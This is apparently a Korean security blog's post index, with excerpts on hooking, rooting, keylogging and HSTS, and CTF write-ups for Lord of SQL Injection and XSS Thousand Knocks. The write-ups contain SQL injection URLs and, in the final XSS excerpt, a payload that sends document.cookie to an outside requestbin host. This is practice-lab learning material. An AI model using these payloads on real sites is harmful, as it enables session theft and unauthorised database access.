전체 글
-
What is Hooking?What is 2025. 8. 13. 23:15
1. Hooking이란 무엇일까요?한 친구가 컵에 물을 따르려고 주방으로 걸어갑니다.그 순간, 당신이 부드럽게 손목을 잡고 말하죠.“잠깐만, 이렇게 따르는 게 더 좋아.”그리고 컵 위치를 살짝 옮겨줍니다.물은 여전히 컵에 들어가지만, 당신이 개입한 덕분에 방향과 방식이 조금 달라진 것이죠.이 장면을 프로그램 세계로 옮겨보면 Hooking입니다.즉, 프로그램이 원래 실행하려던 함수나 메서드의 동작을 중간에서 가로채어 우리가 원하는 방식으로 바꾸는 기술이에요.쉽게 말해, “원래 가던 길에 잠깐 우회로를 만들어주는 것”이라고 생각하면 됩니다. 그래서 Hooking을 이해한다는 건, “프로그램이 어떻게 숨 쉬는지” 들여다보는 능력을 갖는 것과 같습니다.2. Hooking의 종류1) API Hooking – 운영..
-
what is Rooting?What is 2025. 8. 11. 16:18
Rooting과 Hooking 기초 – 루팅 탐지 우회 기본편0. 시작하며여러분, 휴대폰 안에는 우리가 보지 못하는 보안 울타리가 있습니다.제조사와 운영체제가 "이건 건드리지 마" 하고 정해놓은 영역이죠.그런데 이 울타리를 넘어, 휴대폰 속 모든 문을 열 수 있는 ‘열쇠’를 손에 넣는다면 어떨까요?바로 오늘 이야기의 주인공, 루팅(Rooting)입니다.1. Rooting이란?루팅은 안드로이드 기기에서 루트 권한,즉 운영체제의 ‘관리자 계정’을 얻는 걸 말합니다.쉽게 말해, 집 주인의 마스터 키를 쥐고원래 잠겨 있던 방문까지 마음대로 열 수 있는 상태가 되는 거죠.그렇게 되면 어떤 일을 할 수 있을까요?시스템 앱을 강제로 지우기 제조사가 막아둔 숨겨진 설정 열기 앱 데이터를 수정해서 원하는 값으로 바꾸기i..
-
what is Keylogging?What is 2025. 8. 9. 19:45
“키보드에 입력하는 모든 걸 몰래 기록하는 기술”이 있다면, 그게 바로 키로깅입니다.오늘은 이 키로깅이 어떻게 생겼고, 어떻게 움직이며, 어떻게 막을 수 있는지 이야기해 드릴게요. 키로깅이 뭐냐면요자, 여러분이 키보드로 글자를 치고 있다고 상상해 보세요.‘a’, ‘b’, ‘c’… 그리고 스페이스바, 엔터 키, 심지어 백스페이스로 지운 것도 다 기록이 된다면 어떨까요?이걸 키로깅(Keylogging)이라고 부릅니다.원래는 키보드 테스트나 사용자 습관 분석 같은 합법적인 목적에도 쓰일 수 있습니다.하지만 악용되면 비밀번호, 주민번호, 카드번호 같은 민감한 정보를 그대로 훔쳐갈 수 있죠.종류는 두 가지입니다키로거(Keylogger)는 크게 소프트웨어형과 하드웨어형이 있어요.소프트웨어 키로거컴퓨터 안에서 프로그..
-
what is HSTS(HTTP Strict Transport Security)?What is 2025. 8. 9. 18:48
오늘은 HSTS, 정식 명칭으로는 HTTP Strict Transport Security에 대해 이야기해보겠습니다.제가 Burp Suite로 테스트를 하다가 데이터를 가로채지 못하는 상황이 있었어요.이유를 찾아보니, 바로 이 HSTS라는 기능이 적용되어 있었던 거죠.HSTS란 무엇일까요?HSTS는 간단히 말해, 웹사이트가 브라우저에게 이렇게 말하는 거예요.나하고 연결할 땐 꼭 HTTPS, 그러니까 안전하게 암호화된 길로만 와!만약 사용자가 실수로 HTTP, 즉 안전하지 않은 길로 접속하려 해도, 브라우저가 이를 자동으로 HTTPS로 바꿔줍니다.그래서 중간에서 누군가 몰래 데이터를 훔치려고 해도, 그 길 자체를 못 쓰게 막아버리는 거죠.정식 규칙에는 이런 것들이 있습니다HSTS는 RFC 6797이라는 표준..
-
LOS goblin writeupWebHacking/Lord of SQL injection Write-Up 2018. 7. 20. 16:20
LOS goblin writeup 지금 id에 guest가 있고, if($result['id']) echo "Hello {$result[id]}"; if($result['id'] == 'admin') solve("goblin"); id가 admin이 되면 풀리는 문제인듯하다!! http://los.rubiya.kr/goblin_e5afb87a6716708e3af46a849517afdc.php?id=admin&no=1234 이렇게 넣어도 query : select id from prob_goblin where id='guest' and no=1234 쿼리 guest는 바뀌지 않는다. 음...guest를 어떻게 없앨까...? 처음에는 주석으로 guest를 없애서 admin을 넣는 문제인거같은데 도저히 그건 ..
-
LOS cobolt writeupWebHacking/Lord of SQL injection Write-Up 2018. 7. 20. 15:44
LOS cobolt writeup 우선 문제를 보면 get방식으로 되어있고, pw에 md5 암호가 걸려있는 것을 확인할 수 있다. http://los.rubiya.kr/cobolt_b876ab5595253427d3bc34f1cd8f30db.php?id=admin&pw=1234 .위와 같이 query : select id from prob_cobolt where id='admin' and pw=md5('1234') 이렇게 나오고 1번문제 푼것과 같이 넣어보면, http://los.rubiya.kr/cobolt_b876ab5595253427d3bc34f1cd8f30db.php?id=%27or%201=1%23&pw= 이렇게 나온다...음... 이 방법은 아닌가보다. if($result['id'] == 'adm..
-
Los gremlin writeupWebHacking/Lord of SQL injection Write-Up 2018. 7. 20. 15:30
LOS gremlin writeup 문제 확인을 해보면, 위와 같이 나와있고, GET방식으로 되어있음을 알게 된다. http://los.rubiya.kr/gremlin_280c5552de8b681110e9287421b834fd.php?id=yeali&pw=1234 이렇게 입력을 하면, query : select id from prob_gremlin where id='yeali' and pw='1234' 쿼리문이 이렇게 변경되게 된다. id와 pw를 성립하게 해주면 되는 문제인듯하다. http://los.rubiya.kr/gremlin_280c5552de8b681110e9287421b834fd.php?id='or 1=1#&pw= 이렇게 해서 #뒤에는 주석처리를 해주려고 했으나 #이 안들어간다. url 인코..
-
XSS Thousand Knocks Stage4 write upWebHacking/XSS Thousand Knocks Write-Up 2018. 7. 18. 18:27
여기서 시간 많이 썼다. 문제 3번이랑 비슷한데 똑같이 하면 안된다. 그래서 태그를 닫아서 스크립트를 전달하면 ok가 뜬다. http://2375e1f80fe2ec262a235d594fbcee96dba66710.knock.xss.moe/?q='> 이렇게 성공. ps. 이거 textarea로 문제 풀 수 있던데, 어떻게 풀리는지 의문이다. http://2375e1f80fe2ec262a235d594fbcee96dba66710.knock.xss.moe/?q=%22%3E%3C/textarea%3E%3Cscript%3Elocation.href=%27http://requestbin.fullcontact.com/v9x9evv9?a=%27%2Bdocument.cookie%3C/script%3E%3Ctextarea%3E